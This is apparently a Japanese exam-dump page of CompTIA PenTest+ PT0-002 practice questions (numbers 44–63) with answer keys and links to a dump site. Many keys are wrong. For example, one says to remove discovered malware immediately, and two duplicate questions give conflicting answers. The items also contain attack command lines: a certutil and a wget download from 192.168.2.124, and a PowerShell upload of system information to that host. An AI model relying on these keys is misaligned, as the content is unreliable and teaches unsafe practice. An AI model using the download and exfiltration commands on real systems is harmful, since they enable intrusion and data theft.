試験準備には欠かさないトップクラスのCompTIA PT0-002試験学習ガイド練習問題最新版
今すぐPT0-002問題を使おうPT0-002問題集PDFで合格しよう
質問 44
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?
- A. The rules of engagement from the assessment
- B. The executive summary and information regarding the testing company
- C. A quick description of the vulnerability and a high-level control to fix it
- D. Information regarding the business impact if compromised
正解: D
質問 45
Which of the following BEST describe the OWASP Top 10? (Choose two.)
- A. A list of all the risks of web applications
- B. The most critical risks of web applications
- C. A checklist of Apache vulnerabilities
- D. The risks defined in order of importance
- E. A web-application security standard
- F. A risk-governance and compliance framework
正解: B,D
質問 46
A penetration tester is attempting to discover live hosts on a subnet quickly.
Which of the following commands will perform a ping scan?
- A. nmap -sT -p- 10.12.1.0/24
- B. nmap -sV -A 10.12.1.0/24
- C. nmap -Pn 10.12.1.0/24
- D. nmap -sn 10.12.1.0/24
正解: D
質問 47
A penetration tester has been given an assignment to attack a series of targets in the 192.168.1.0/24 range, triggering as few alarms and countermeasures as possible.
Which of the following Nmap scan syntaxes would BEST accomplish this objective?
- A. nmap -sV 192.168.1.2/24 -PO
- B. nmap -sT -vvv -O 192.168.1.2/24 -PO
- C. nmap -sS -O 192.168.1.2/24 -T1
- D. nmap -sA -v -O 192.168.1.2/24
正解: C
質問 48
A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this type of assessment?
- A. Establish communication and escalation procedures with the client.
- B. Verify the client has granted network access to the hot site.
- C. Ensure the client has signed the SOW.
- D. Determine if the failover environment relies on resources not owned by the client.
正解: D
質問 49
A penetration tester is preparing to perform activities for a client that requires minimal disruption to company operations. Which of the following are considered passive reconnaissance tools? (Choose two.)
- A. Retina
- B. Shodan
- C. Nikto
- D. Burp Suite
- E. Nessus
- F. Wireshark
正解: B,F
質問 50
Penetration-testing activities have concluded, and the initial findings have been reviewed with the client. Which of the following best describes the NEXT step in the engagement?
- A. Attestation of findings and delivery of the report
- B. Scheduling of follow-up actions and retesting
- C. Acceptance by the client and sign-off on the final report
- D. Review of the lessons learned during the engagement
正解: C
質問 51
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?
- A. Collect the proper evidence and then remove the malware.
- B. Analyze the malware to see what it does.
- C. Remove the malware immediately.
- D. Stop the assessment and inform the emergency contact.
- E. Do a root-cause analysis to find out how the malware got in.
正解: C
質問 52
Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)
- A. The vulnerability identifier
- B. The name of the person who found the flaw
- C. The tool used to find the issue
- D. The network location of the vulnerable device
- E. The CVSS score of the finding
- F. The client acceptance form
正解: A,C
質問 53
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?
- A. Perform forensic analysis to isolate the means of compromise and determine attribution.
- B. Create a detailed document of findings before continuing with the assessment.
- C. Incorporate the newly identified method of compromise into the red team's approach.
- D. Halt the assessment and follow the reporting procedures as outlined in the contract.
正解: B
質問 54
A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:
Pre-engagement interaction (scoping and ROE)
Intelligence gathering (reconnaissance)
Threat modeling
Vulnerability analysis
Exploitation and post exploitation
Reporting
Which of the following methodologies does the client use?
- A. OWASP Web Security Testing Guide
- B. PTES technical guidelines
- C. NIST SP 800-115
- D. OSSTMM
正解: B
質問 55
A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial dat a. Which of the following should the tester do with this information to make this a successful exploit?
- A. Use BeEF.
- B. Perform XSS.
- C. Conduct a watering-hole attack.
- D. Use browser autopwn.
正解: B
質問 56
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important dat a. Which of the following was captured by the testing team?
- A. User hashes sent over SMB
- B. Multiple handshakes
- C. Encrypted file transfers
- D. IP addresses
正解: A
質問 57
A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position.
Which of the following actions, if performed, would be ethical within the scope of the assessment?
- A. Gaining access to hosts by injecting malware into the enterprise-wide update server
- B. Intercepting outbound TLS traffic
- C. Establishing and maintaining persistence on the domain controller
- D. Leveraging a vulnerability on the internal CA to issue fraudulent client certificates
- E. Exploiting a configuration weakness in the SQL database
正解: B
質問 58
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
- A. certutil
-urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe - B. schtasks /query /fo LIST /v | find /I "Next Run Time:"
- C. wget
http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe - D. powershell
(New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
正解: D
質問 59
A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?
- A. Run nmap with the --script vulners option set against the target
- B. Run nmap with the -sV and -p22 options set against the target
- C. Run nmap with the -sA option set against the target
- D. Run nmap with the -o, -p22, and -sC options set against the target
正解: C
質問 60
A penetration tester discovers that a web server within the scope of the engagement has already been compromised with a backdoor. Which of the following should the penetration tester do NEXT?
- A. Continue the engagement and include the backdoor finding in the final report
- B. Inform the customer immediately about the backdoor
- C. Forensically acquire the backdoor Trojan and perform attribution
- D. Utilize the backdoor in support of the engagement
正解: B
質問 61
A client has requested that the penetration test scan include the following UDP services: SNMP, NetBIOS, and DNS. Which of the following Nmap commands will perform the scan?
- A. nmap -vv sUV -p 53, 122-123, 160-161 10.10.1.20/24 -oA udpscan
- B. nmap -vv sUV -p 53, 123-159 10.10.1.20/24 -oA udpscan
- C. nmap -vv sUV -p 53,137-139,161-162 10.10.1.20/24 -oA udpscan
- D. nmap -vv sUV -p 53,123,161-162 10.10.1.20/24 -oA udpscan
正解: D
質問 62
A penetration tester is exploring a client's website. The tester performs a curl command and obtains the following:
* Connected to 10.2.11.144 (::1) port 80 (#0)
> GET /readmine.html HTTP/1.1
> Host: 10.2.11.144
> User-Agent: curl/7.67.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200
< Date: Tue, 02 Feb 2021 21:46:47 GMT
< Server: Apache/2.4.41 (Debian)
< Content-Length: 317
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE html>
<html lang="en">
<head>
<meta name="viewport" content="width=device-width" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>WordPress › ReadMe</title>
<link rel="stylesheet" href="wp-admin/css/install.css?ver=20100228" type="text/css" />
</head>
Which of the following tools would be BEST for the penetration tester to use to explore this site further?
- A. DirBuster
- B. Burp Suite
- C. OWASP ZAP
- D. WPScan
正解: B
質問 63
A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?
- A. schtasks /query /fo LIST /v | find /I "Next Run Time:"
- B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/ upload.php', 'systeminfo.txt')
- C. certutil -urlcache -split -f http://192.168.2.124/windows-binaries/ accesschk64.exe
- D. wget http://192.168.2.124/windows-binaries/accesschk64.exe -O accesschk64.exe
正解: B
質問 64
......
無料CompTIA PenTest+ PT0-002試験問題:https://www.goshiken.com/CompTIA/PT0-002-mondaishu.html
問題集練習試験問題学習ガイドはPT0-002試験で使える:https://drive.google.com/open?id=1DPaJ7JtaMgcHIQq0772pDt7PLCtzojWy